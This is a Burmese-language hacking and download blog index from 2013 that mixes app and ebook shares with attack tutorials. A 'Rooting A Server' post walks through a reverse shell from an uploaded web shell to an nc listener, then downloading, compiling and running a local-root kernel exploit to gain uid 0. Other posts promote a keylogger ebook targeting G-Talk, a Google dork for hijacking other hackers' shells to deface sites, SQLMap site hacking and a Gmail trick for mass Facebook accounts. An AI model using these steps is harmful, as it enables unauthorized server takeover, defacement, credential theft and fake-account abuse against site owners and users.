SQL ပိုင်းနဲ့ပတ်သက်ပြီး ကျွန်တော်အရင်က စာအုပ်တွေ၊ ပို့စ်တွေကို သူများတွေရေးထားတာကိုရှယ်ဖူးပါတယ်။ ဒီစာအုပ်လေးကတော့ အကြိုက်ဆုံးပဲဗျာ။ တကယ်ကို Beginner သမားတွေဖတ်လို့ကောင်းမယ့်စာအုပ်ပါပဲ။ နားလည်လွယ်အောင် ပုံလေးတွေနဲ့ရှင်းပြထားပါတယ်။ တကယ်ပါဗျာ။ ဒေါင်းပြီးဖတ်သင့်တယ်။ :D
7/19/2013
SQLMap on Windows By LiT2le
MHU က ဥအသေးလေးစာအုပ်ကိုရှယ်ပေးလိုက်ပါတယ်ဗျာ။ SQLMap နဲ့ ဆိုဒ်တစ်ခုကိုဟတ်နည်းပါ။ ဒေါင်းပြီးဖတ်သင့်တယ်ထင်ပါတယ်။
Author: LiT2le
Publisher: www.lit2le.blogspot.com
File Size: 393 KB
Pages: 7
Labels:
Hacking Ebooks,
SQL Injection
How to Speedup Download Speed with IDM
ဒီနည်းလမ်းလေးအသုံးပြုပြီး ကျွန်တော်တို့ IDM ကနေ Download Speed ကိုမြှင့်တင်ကြည့်ရအောင်ဗျာ။ ဟုတ်သော်ရှိမဟုတ်သော်ရှိ တကယ်လို့ ရခဲ့ရင် အမြတ်ပဲပေါ့။ လုပ်ရမယ့် Configuration process ကလည်းလွယ်ပါတယ်။ ကျွန်တော်တို့ IDM ကိုဖွင့်လိုက်မယ်ဗျာ။
Labels:
Tips and Tricks
7/18/2013
Notepad ဖြင့် Keylogger တစ်ခု ရေးသားနည်း ( မြန်မာလို )
ဒီစာအုပ်လေးကတော့ အဓိက G-Talk ကို ဦးတည်ပီး Hack နည်း တစ်ခု အဖြင့် ရေးသားပေးထားတာပါ။
လိုချင်တဲ့သူများ အောက်က လင့်မှာဒေါင်းလော့ ရယူနိုင်ပါပီ။ ကျွန်တော်တို့ နည်းပညာ သမားတွေပာာ ကျွန်တော်တို့  မှတ်သား မိသလောက်တွေကို တစ်ခြားသူတွေ ထံ မျှ ဝေ ပေးတတ်ကြပါတယ်။ သင်ကော လေ့လာ မှတ်သား မိတာတွေ ရှိခဲ့ရင် သင့် လက်လှမ်း မှီ သလောက် မိတ်ဆွေ များကို ပြန်လည် မျှဝေပေးပါလို့  မေတ္တာ ရပ်ခံ အပ်ပါတယ်။ ဒီစာအုပ်လေးကို တော့ အိုင်တီ သမားတိုင်းလိုလို ဒေါင်းစေချင်ပါတယ်။ ဘာလို့ လည်းဆို တော့ဒီစာအုပ်လေးတည်းမှာ Keylogger အကြောင်း ဗပာုသုတတွေနဲ့ ..အလွယ်ကူဆုံး မိမိ ကိုယ်တိုင် ပြု့ လုပ်နိုင်တဲ့ Keylogger တစ်ခုကို ထည့်သွင်းရေးထားတာမို့ လို့ ပါ။

Download Link 2 : Mirrorcreator Mediafire
Labels:
Hacking Ebooks,
Myanmar Ebooks
7/17/2013
Rooting A Server
Root ဆိုတာဘာလဲ
Root ဆိုတာ အကြမ်းဖျင်းအားဖြင့် Server တစ်ခုရဲ့ Administrator ဖြစ်အောင်လုပ်လိုက်တာပါပဲ။
တကယ်လို့  သင်သာ server တစ်ခုရဲ့  root access ရလို့ ကတော့ အဲ့ server ကို သင်လုပ်ချင်သလိုလုပ်လို့ ရပါပြီ။
အဲ့လောက်ဆို ဘာလို့  Server တစ်ခုကို Hack ဖို့ အတွက် root access ရဖို့ ဘာလို့ အရေးကြီးသလဲဆိုတာ သဘောပေါက်လောက်ပြီထင်တယ်။
Root ဘယ်လိုဖောက်ကြမလဲ
Server တစ်ခုကို ဖောက်ဖို့ အတွက် root ဖောက်နည်း ( ၃ ) နည်းရှိပါတယ်။
( ကျနော်သိသလောက်ပြောတာပါ ကျနော်ကိုယ်တိုင်လဲ Hacking ပိုင်းမှာ ဆရာမကျ သေးတော့ တစ်ခြားနည်းတွေလည်း ရှိချင်ရှိအုံးမှာပါ။ )
၁။ Local Root.
၂။ SQL by reading same important files on it root password.
၃။ exploit on software (Buffer Overflow).
ဒီပိုစ့် မှာတော့ Local Root အကြောင်းကို ရှင်းလင်းပြသပေးသွားမှာဖြစ်ပါတယ်။
Shell ကို server ပေါ် upload လုပ်ပြီးတဲ့ အခါ root access ရဖို့ အတွက် back connect လုပ်ပြီး local root ကို run ရပါမယ်။ ဒါဟာ နောက်အဆင့်မှာ ဖော်ပြမယ့် local root ကို ဘယ်လို ရှာရမလဲ ဆိုတာနဲ့  root access ရအောင်ဘယ်လို လုပ်ရမယ်ဆိုတာရဲ့  Basic Concept လေးပါ။
Local Root ကို ဘယ်လိုရှာကြမလဲ
အရင်ဆုံး kernel version ဘယ်လောက်လဲဆိုတာသိရပါ့မယ်။
kernel version ကို သင့်ရဲ့  shell ကနေတဆင့်သိနိုင်ပါတယ်။ (ဥပမာ ။ ။ This version is 2.6.18 - 2012)
ဒါမှမဟုတ် သင့် ရဲ့  shell မှာ "uname -a" ဆိုပြီး Execute လုပ်ပြီးရှာရင်လဲ kernal version သိနိုင်ပါတယ်။
local root ကို provide လုပ်ပေးတဲ့  website တွေဖြစ်တဲ့  Exploit-db တို့ Packet Storm တို့ လို site တွေမှာ ရှာဖွေလို့ ရပါတယ်။
နောက်တစ်ချက် သတိထားရမှာက local root မှာ
1. Local.C : which are not ready.
2. Local : ready to use.
ဆိုပြီး (၂) မျိုး ရှိတယ်ဆိုတာပါပဲ။

Root Access ဘယ်လို ယူမလဲ
အရင်ဆုံးလိုအပ်တာကတော့ သင့်မှာ အောက်က ပုံထဲကလို Back Connect Option ပါတဲ့ Shell တစ်ခုလိုပါတယ်။
Server မှာ Public IP Address ကို ရိုက်ထည့်ရပါမယ်။
Port မှာ connect လုပ်ချင်တဲ့ port ကို ဖြည့်လိုက်ပါ။
ဒါဆိုရင်တော့ back connect ဖြစ်သွားပြီဖြစ်ပါတယ်။ ဒီနေရာမှာတော့ BackTrack အသုံးပြုဖို့ လို အပ်လာပါပြီ Terminal ကို ဖွင့်လိုက်ပါ။ ပြီးရင်တော့ အောက်မှာဖော်ပြထားသော အဆင့်များကို ပြုလုပ်ပါ။

၁။
nc -vlp 433 လို့ ရိုက်ထည့်လိုက်ပါ။
၂။ Wget [**** local-Root.zip] (**** နေရာမှာ local-Root.zip ရှိတဲ့ link ကိုဖြည့်ပါ)
၃။ unzip local-Root.zip
၎။ chmod 777 local.c
၅။ local root ကို ပြောင်းဖို့ အတွက် local.c > local
gcc local.c -o local ဒီလိုဆိုရင် local c ကနေ local ကိုပြောင်းသွားတာ တွေ့ ရပါမယ်။
၆။ chmod 777 local
၇။ ./local to local root work
၈။ su
ဒါဆိုရင်တော့ uid=0(root) gid=0(root) groups=0(root) ဒီလိုလေးဖြစ်သွားပါလိမ့်မယ်။
သဘောက UID=0 ဆိုတာ root access ရသွားပြီလို့ ပြောတာဖြစ်ပါတယ်။
Root Access ရပြီဆိုရင်တော့ ဒါတွေ လုပ်လို့ ရပြီ

Credit: http://koalpha.blogspot.com/2013/06/rooting-server.html
Labels:
Hacking
7/16/2013
Find Shell Using "Index of /sh3IIZ" Google Dork
ဒီနည်းလမ်းကတော့ ဟက်ကာတွေရဲ့ကတုံးပေါ်ထိပ်ကွက်တဲ့နည်းလို့ဆိုရမလား၊ ကလေးအထာလို့ပြောမရမလားတော့ မသိပါဘူး။ နည်းလမ်းဟောင်းဖြစ်ပေမယ့် အသုံးဝင်ပါသေးတယ်။ ဒါကတော့ ဟက်ကာတစ်ယောက်ယောက်ကတင်ထားတဲ့ shell ကိုရှာပြီးအဆင်ပြေရင် ကိုယ်နာမည်နဲ့ shell တင်ပြီး Deface ကောက်တင်နိုင်မယ့်နည်းလေးပါ။ ကျွန်တော်စမ်းကြည့်တာ ဆိုဒ်တစ်ကို လူသုံးလေးယောက်လောက်ကို shell လာတင်ထားတာတွေ့ပါတယ်။ အသုံးပြုရမည့် google dork ကတော့ အောက်မှာပါ။
Labels:
Google Dork,
Hacking
Next Launcher3D apk
ဒီနေ့တော့ကွန်ကနည်းနည်းကောင်းနေတာနဲ့ အားအားယားယား Launcher လေးတစ်ခုတင်ပေးလိုက်တယ်ဗျာ။ လိုခင်သူများယူကြနိုင်ပါပြီ။ :D
Support Android 2.1 and higher.
Support Android 2.1 and higher.
File Size: 5.6 MB
Download:
Labels:
Android
Gmail Account တစ်ခုတည်းနဲ့  Facebook Account တွေ အများကြီးဖွင့်ကြမယ်
ဒါပေမယ့် ကျနော့်မှာ mail account တစ်ခုတည်းနဲ့  facebook account တွေ အများကြီးဖွင့်လို့ ရတဲ့နည်းရှိတယ်။အရင်ဆုံး အသုံးပြုမယ့် mail က ဥပမာအနေနဲ့  kochartape@gmail.com ပဲဆိုပါစို့ ။
www.facebook.com ကို သွားပြီးတော့ sign up လုပ်ပါ။
အဲ့လို sign up လုပ်တဲ့နေရာမှာ name တို့  Date of Birth စသည်ဖြင့် အားလုံးကို ပုံမှန်အတိုင်းပဲဖြည့်လိုက်ပါ။
ဒါပေမယ့် email address ဆိုတဲ့နေရာမှာ Fake email ဒါမှမဟုတ် မရှိတဲ့ mail address တစ်ခုကို ဖြည့်လိုက်ပြီး sign up လုပ်လိုက်ပါ။ အခြား sign up လုပ်တဲ့ step တွေကိုလည်း ပုံမှန်အတိုင်းပဲ အဆင့်ဆင့်လုပ်သွားပါ။
အဲ့ဒါဆိုရင် email address နဲ့ ပတ်သတ်ပြီး သင်ထည့်လိုက်တဲ့ mail ကို verify လုပ်လို့ မရဘူး mail မှားနေတယ်လို့  error message ကျလာပါလိမ့်မယ်။
အဲ့အခါကျမှ change email address ကို နှိပ်လိုက်ပြီးတော့ ခုနက တကယ် အသုံးပြုမယ့် mail ဖြစ်တဲ့ ( kogyichartape@gmail.com ) အစား kochartape@gmail.com လို့ ဖြည့်လိုက်ပါ။
ဒါဆိုရင် ဘာဖြစ်သွားမယ်ထင်လဲ verification mail က kochartape@gmail.com ကို verify လုပ်သွားမှာဖြစ်ပါတယ်။
ဒီနေရာမှာ တစ်ခုရှိတာက တိုက်တိုက်ဆိုင်ဆိုင် အဲ့ k.ochartape@gmail.com က တကယ် ရှိနေရင်တော့ မရဘူးပေါ့ဗျာ ဒါကလဲ တော်တော်တိုက်ဆိုင်မှပါ။
ဒီလိုဆိုရင်တော့ kochartape@gmail.com ကို အသုံးပြုပြီးတော့ facebook account တစ်ခုရသွားပြီဖြစ်ပါတယ်။
ဒါဆို နောက်ထပ် facebook account တစ်ခု ထပ်ဖွင့်ရအောင်
အထက်က sign up လုပ်တဲ့ အဆင့်တွေအတိုင်းပဲ လုပ်ပါ
ဒါပေမယ့် ပထမတစ်ခါတုန်းက kogyichartape@gmail.com နဲ့  လုပ်ရင်နောက်တစ်ခါ kochartape@gmail.com နဲ့ ပြောင်းလုပ်ပါ။ ဒါလဲအတူတူပဲ kochartape@gmail.com ကို ပဲ verification ပေးမှာပဲ
အဲ့လိုနည်းနဲ့  dot တွေကို နေရာပြောင်းပြောင်းပြီး facebook account များစွာကို ဖွင့်သွားလို့ ရပါတယ်
verification mail ကတော့ တစ်ခုတည်းပေါ့

ပိုမို သိလိုသူများ ဒီလင့်မှာ သွားရောက်လေ့လာ ပါ.. ( Click Here )
Labels:
Facebook
Blogger Apk for Android
Blogger သမားတွေသုံးသင့်တဲ့ android apk လေးပါ။ ဒီကောင်ကိုသုံးဖို့ ဖုန်းမှာ Google Service တော့ရှိဖို့လိုပါမယ်။ ဘာလို့လည်းဆိုတော့ Google Account ရှိဖို့လိုတာကိုး။ Google Service ရှိတဲ့ဖုန်းတွေကဘာမှမလိုပေမယ့် တရုတ်ဖုန်းတွေတော့အဆင်ပြေမယ်မထင်ပါ။ ကျွန်တော်လည်းအဆင်မပြေပါဘူး။ :(
7/15/2013
Java The Complete Reference 8th Edition
bro တစ်ယောက် Java စာအုပ်လိုချင်တယ်ဆိုလို့ ဂရုတစ်ခုကနေပြန်ကူးတင်ပေးလိုက်ပါတယ်။ အရင်ကတင်ထားတာတွေက လင့်တွေသေနေတာလားမသိပါဘူး။ ကျွန်တော်လည်းအကုန်မစစ်အားတာနဲ့ ဘယ်ဖိုင်တွေလင့်သေနေသလဲဆိုတာ အခုလောလောဆယ်တော့ မစစ်အားသေးပါဘူး။ နောက်မှ သေချာစစ်ပြီး ပြန်တင်ပေးပါမယ်။ အဆင်ပြေရင်ပေါ့။ လောလောဆယ်တော့ ဒီစာအုပ်လေးကိုပဲတင်ပေးလိုက်ပါတယ်။ လိုချင်တဲ့စာအုပ်တွေကို Google ကနေရှာရင်လည်းရပါတယ်။ ဥပမာ index of java programming ebooks pdf ဘာညာဆိုပြီးပေါ့။ စာအုပ်တော်တော်များများကို ကျွန်တော်လည်း ဒီလိုပဲရှာပြီး ကောက်တင်ပေးလိုက်တာပါ။ :D
Labels:
Programming eBooks
7/14/2013
Facebook 3.4
Facebook ရဲ့နောက်ဆုံးဗားရှင်းလေးပေါ့။ ဘာတွေထူးခြားလာလဲဆိုတော့ အရင်ဗားရှင်းတွေထက်စာရင် ပိုမိုပေါ့ပါးတယ်လို့တော့ ပြောတာပဲ။ ဒီဗားရှင်းမှာ မြင်ကွင်းကတော့ ဘာမှထူးထူးခြားခြား ပြောင်းလဲထားတာတော့မတွေ့မိပါ။ နောက်ဆုံးဗားရှင်းကိုမှလိုချင်သူများအတွက် တင်ပေးလိုက်ရတာပါ။ လိုချင်တယ်ဆိုရင် အောက်မှာယူသွားနိုင်ပါပြီ။ အဆင်ပြေကြပါစေဗျာ။
Data Structures Using C++
C++ Programming အတွက်စာအုပ်ကောင်းလေးမျှဝေလိုက်ပါတယ်ဗျာ။ ကိုပေါက်ဆိုဒ်ကနေမလာတာပါ။ ဆိုဒ်တော်တော်များများမှာ ရှယ်ထားတာတွေ့လို့ ကျွန်တော်လည်းပြန်ရှယ်လိုက်ပါတယ်။ :D အဆင်ပြေကြပါစေဗျာ။
Labels:
Programming eBooks
7/13/2013
ကွန်ပျူတာအခြေခံနှင့် Windows 7 အသုံးပြုနည်း
Author: မောက်မောက်လေး
Publisher: www.soesoehein.blogspot.com
File Size: 24.83 MB
Total Pages:168
Download: Mediafire
Labels:
Windows,
Windows 7 Ebooks
CMS Detector for Google Chrome
ကျွန်တော် ခုရက်ပိုင်း Firefox က crash ခဏခဏဖြစ်တာနဲ့ Google Chrome ဖက်ခဏပြောင်းသုံးပါတယ်။ MCA Extension သွင်းရင်းနဲ့ နောက်ထပ် Extension တစ်ခုကိုတွေ့ထားပါတယ်။ အဲဒါကတော့ Chrome Sniffer လို့ခေါ်ပါတယ်။ ဒီ Extension ကတော့ ဘာလုပ်ပေးနိုင်သလဲဆိုတော့ ဆိုဒ်တစ်ခုရဲ့ CMS လို့ခေါ်တဲ့ ဘယ်ဟာနဲ့ Run သလဲဆိုတာကို Auto Detect လုပ်ပေးနိုင်ပါတယ်။ ဥပမာ PHP လား Joomla လား Wordpress လားပေါ့။ တခါတည်း Icon လေးနဲ့ပါသေချာပြပေးတယ်နော် :D ဒါဆို ဆိုဒ်ကိုဝင်လိုက်တာနဲ့အထွေအထူးလုပ်စရာမလုပ်ဘဲ အဲဒီဆိုဒ်ဘာနဲ့ Run ထားတယ်ဆိုတာ တန်းသိနိုင်မှာဖြစ်ပါတယ်။ Chrome Sniffer ကိုအောက်က မူရင်း Chrome Web Store ကနေသွားပြီး အင်စတော့လုပ်နိုင်ပါတယ်။ Official Web Store ဖြစ်တာမို့ စိတ်ချစွာ သွင်းနိုင်ပါတယ်။ :) ဘယ်လိုလုပ်ရတယ်ဆိုတာမပြောတော့ဘူးနော်။ :D သူကတော့ ခုလောလောဆယ် Popular ဖြစ်နေတဲ့ CMS 100 ကျော်ကို Detect လုပ်ပေးနိုင်ပါသတဲ့။
Labels:
Google Chrome,
Hacking
Subscribe to:
Posts (Atom)